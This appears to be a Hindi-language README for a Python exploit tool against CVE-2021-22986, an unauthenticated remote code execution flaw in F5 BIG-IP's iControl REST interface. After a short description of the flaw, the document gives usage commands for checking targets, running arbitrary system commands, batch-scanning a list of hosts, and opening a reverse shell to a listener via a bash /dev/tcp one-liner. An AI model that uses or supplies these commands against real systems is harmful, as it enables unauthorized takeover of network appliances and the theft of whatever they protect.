
CVE-2021-22986 और F5 BIG-IP RCE
यह भेद्यता अनधिकृत हमलावरों को, जिनके पास iControl REST इंटरफ़ेस तक नेटवर्क पहुँच है, BIG-IP प्रबंधन इंटरफ़ेस और स्वयं IP पतों के माध्यम से, मनमानी सिस्टम कमांड निष्पादित करने, फ़ाइलें बनाने या हटाने और सेवाओं को अक्षम करने की अनुमति देती है। इस भेद्यता का शोषण केवल कंट्रोल प्लेन के माध्यम से किया जा सकता है, डेटा प्लेन के माध्यम से नहीं। शोषण से पूर्ण सिस्टम समझौता हो सकता है। BIG-IP सिस्टम Appliance मोड में भी असुरक्षित है।
मूल उपयोग
python3 CVE_2021_22986.py

भेद्यता जांच
python3 CVE_2021_22986.py -v true -u https://192.168.174.164

कमांड निष्पादित करें:
python3 CVE_2021_22986.py -a true -u https://192.168.174.164 -c id

python3 CVE_2021_22986.py -a true -u https://192.168.174.164 -c whoami

बैच स्कैन
python3 CVE_2021_22986.py -s true -f check.txt

रिवर्स शेल
python3 CVE_2021_22986.py -r true -u https://192.168.174.164 -c "bash -i >&/dev/tcp/192.168.174.129/8888 0>&1"


python3 newpoc.py https://192.168.174.164
